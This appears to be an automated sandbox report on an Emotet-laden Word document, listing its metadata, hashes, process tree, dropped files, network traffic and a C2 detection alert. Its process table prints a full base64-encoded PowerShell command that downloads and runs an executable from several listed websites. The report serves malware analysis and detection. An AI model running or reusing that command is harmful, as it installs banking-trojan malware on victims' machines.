File name: | BH-2143 report p1.doc |
Full analysis: | https://app.any.run/tasks/54cbdfca-1aca-4456-8e6a-db072056b4cc |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 14, 2019, 21:39:39 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Center, Subject: Tennessee, Author: Joy Howe, Keywords: virtual, Comments: Savings Account, Template: Normal.dotm, Last Saved By: Dedric Toy, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 14 15:06:00 2019, Last Saved Time/Date: Mon Oct 14 15:06:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 174, Security: 0 |
MD5: | 7450BFAD04A2957C78CEA3BE8C8DEB99 |
SHA1: | F3318FC0520581572C7539DB464C1DF8CB8F930C |
SHA256: | E856662BA9743307B0729746E88844935CACC1F126CBD2709C5F10916676EBD5 |
SSDEEP: | 3072:DqfzpFGKgdzSrGpKyIwLx38V3ggo7V1FjDQJ1dLHHRBgD:DqfzpFGKUzSGnLx38gjirnvg |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
Manager: | Parker |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 203 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Strosin LLC |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 174 |
Words: | 30 |
Pages: | 1 |
ModifyDate: | 2019:10:14 14:06:00 |
CreateDate: | 2019:10:14 14:06:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | Dedric Toy |
Template: | Normal.dotm |
Comments: | Savings Account |
Keywords: | virtual |
Author: | Joy Howe |
Subject: | Tennessee |
Title: | Center |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2200 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\BH-2143 report p1.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3836 | powershell -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeABmADAANQA1ADAAZgAyAGUANQA2AGQAZABjAD0AJwBhADAAeAAxAGUANwA3AGIAOAA1ADEAZAA0ACcAOwAkAGEAMAB4AGIAMgBjAGMANwBkADAAMgAzADkAIAA9ACAAJwAzADEANwAnADsAJABhADAAeAA5ADkAOABmADEAOAA0ADIAMgBlADMAZgA9ACcAYQAwAHgAYgBhADUANQBmADAAMwBiAGUAMwBiADIAMQBkAGEAJwA7ACQAYQAwAHgAOQBhADIAYgA1AGEAMQAzADMAOABmADUAMAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYQAwAHgAYgAyAGMAYwA3AGQAMAAyADMAOQArACcALgBlAHgAZQAnADsAJABhADAAeAAwADQAOQA4ADUAZAA3AGIANQA3AD0AJwBhADAAeAAyAGEAOAAxAGQAZABhAGMANwA1AGIAMgBlACcAOwAkAGEAMAB4ADIAZQAyADUAOQBhADcAOAA4ADQAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgBqAGUAJwArACcAYwAnACsAJwB0ACcAKQAgAG4ARQBUAC4AVwBlAEIAQwBMAEkARQBOAHQAOwAkAGEAMAB4ADYANwBkAGEANwBmADkAOAAyADYANgA9ACcAaAB0AHQAcABzADoALwAvAGYAaQBsAGUAZwBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAEsAbAAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBlAHIAYwBlAGsAbwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADEAZQBrADcALwAqAGgAdAB0AHAAcwA6AC8ALwBrAGEAbQBwAHUAcwBtAGEAbgBpAGEALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwA0AGYAMgBjADgALwAqAGgAdAB0AHAAcwA6AC8ALwB2AHAAcwAzADMAMwAuAGMAbwBtAC8AMAA3AGgAMwAxAC8AMQBnAGoAeQA5AC8AKgBoAHQAdABwADoALwAvAG4AdQB0AHQAbABlAGYAaQBiAGUAcgBhAHIAdAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AZQBJAEQAQwBhAE8ALwAnAC4AIgBzAFAAYABMAGkAdAAiACgAJwAqACcAKQA7ACQAYQAwAHgAMwBmADcANwA4ADIANwAzAGEAYwA0ADUAZAA9ACcAYQAwAHgAOQA4ADAAYgBjADgAMwAxADMAZgBmACcAOwBmAG8AcgBlAGEAYwBoACgAJABhADAAeAA3ADYAZABiADIANABkADAAMQA3ACAAaQBuACAAJABhADAAeAA2ADcAZABhADcAZgA5ADgAMgA2ADYAKQB7AHQAcgB5AHsAJABhADAAeAAyAGUAMgA1ADkAYQA3ADgAOAA0AC4AIgBEAE8AYABXAGAATgBMAE8AQQBgAGQARgBpAGwAZQAiACgAJABhADAAeAA3ADYAZABiADIANABkADAAMQA3ACwAIAAkAGEAMAB4ADkAYQAyAGIANQBhADEAMwAzADgAZgA1ADAAKQA7ACQAYQAwAHgAYQA4ADcAYQBhADgANABjAGUAMAA5AGMAPQAnAGEAMAB4AGQANAA4ADcAZABlAGQAYgAzADEAMgBlACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJACcAKwAnAHQAJwArACcAZQBtACcAKQAgACQAYQAwAHgAOQBhADIAYgA1AGEAMQAzADMAOABmADUAMAApAC4AIgBMAGUAYABOAGcAdABIACIAIAAtAGcAZQAgADMAMAAzADIAMwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAYABBAFIAVAAiACgAJABhADAAeAA5AGEAMgBiADUAYQAxADMAMwA4AGYANQAwACkAOwAkAGEAMAB4AGUAMwA3ADgAMAA3ADgAMgA1AGEAYgA0ADkAZQBiAD0AJwBhADAAeABmADAAMAA2AGMAYgA4ADIANAAyAGYANQA1ADgAYwAnADsAYgByAGUAYQBrADsAJABhADAAeABkAGEAOQAwAGMANABmAGEAZgBlAGMAPQAnAGEAMAB4AGUAZgBjAGEAMwBkAGEAOQAxADgAZgA2AGIANAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABhADAAeAAwADIAZQA4ADUAMAAxAGUANgAyAGIAMQBiAGQAYwA9ACcAYQAwAHgAZQA0AGYAOQBhADQAZQAxAGEAYwAyACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3556 | "C:\Users\admin\317.exe" | C:\Users\admin\317.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
4008 | --1d8db577 | C:\Users\admin\317.exe | 317.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3860 | "C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe" | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | — | 317.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
600 | --f91b2738 | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | msptermsizes.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
2200 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA591.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3836 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OOTW7H5SIDRW0SE95VYH.temp | — | |
MD5:— | SHA256:— | |||
3836 | powershell.exe | C:\Users\admin\317.exe | — | |
MD5:— | SHA256:— | |||
2200 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\50F3C05F.wmf | wmf | |
MD5:D0BF0326CAAE45FEC993D7F4D1569449 | SHA256:64AC126C9EFEA8E8ECA5843E7429C6A471F0F730752266AC5EBB12C1B5B23614 | |||
2200 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AEE5D227.wmf | wmf | |
MD5:B0ADA76430D80AE6B53896F62AB1CFC1 | SHA256:7D5118701B2E19C1F1F0792D07F6761591B41F4AEEDFEC11D85D9BD638ADC37E | |||
2200 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EAD70663.wmf | wmf | |
MD5:92E22A531AE2D7C665552ED9D22B795C | SHA256:D2274C1479455DE90D6E78E8FB9BA0C4F471148822DF0BD92BDD5CCDC96A147D | |||
2200 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\99003169.wmf | wmf | |
MD5:BF08D0EAE3D4ACE219D2F1D9E54F7AC0 | SHA256:4B4AB9FA1543F85B58E9EFA32A6D95309A6C7D6AE337199D28A82B8FC24C120F | |||
2200 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\86DF25CD.wmf | wmf | |
MD5:BF2FBD2461F7369B7C2D045C08DAE0DD | SHA256:2882D61A24E89ACA62427EFD4FCC57845D817C9132F7DFD1DBFA8906CAAB63C4 | |||
2200 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F93635FC.wmf | wmf | |
MD5:A37CC48ADB8E5A1FF455FE4E46E00800 | SHA256:C02789BC63F8E33C68BC89E5C0B0585F9F367CF07517F04C96FAA5A66D06ED89 | |||
2200 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:1DD2F5928DCD3CDF17A86F9BE94610D1 | SHA256:88751651F4EC92DCD0AF0F9DA378561362BDAE72A80BD6033A5D1D6EB238F19C |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
600 | msptermsizes.exe | POST | — | 200.51.94.251:80 | http://200.51.94.251/chunk/sess/add/merge/ | AR | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3836 | powershell.exe | 104.27.143.41:443 | www.merceko.com | Cloudflare Inc | US | unknown |
3836 | powershell.exe | 104.31.95.133:443 | filegst.com | Cloudflare Inc | US | shared |
600 | msptermsizes.exe | 200.51.94.251:80 | — | Telefonica de Argentina | AR | malicious |
Domain | IP | Reputation |
---|---|---|
filegst.com |
| unknown |
www.merceko.com |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
600 | msptermsizes.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 15 |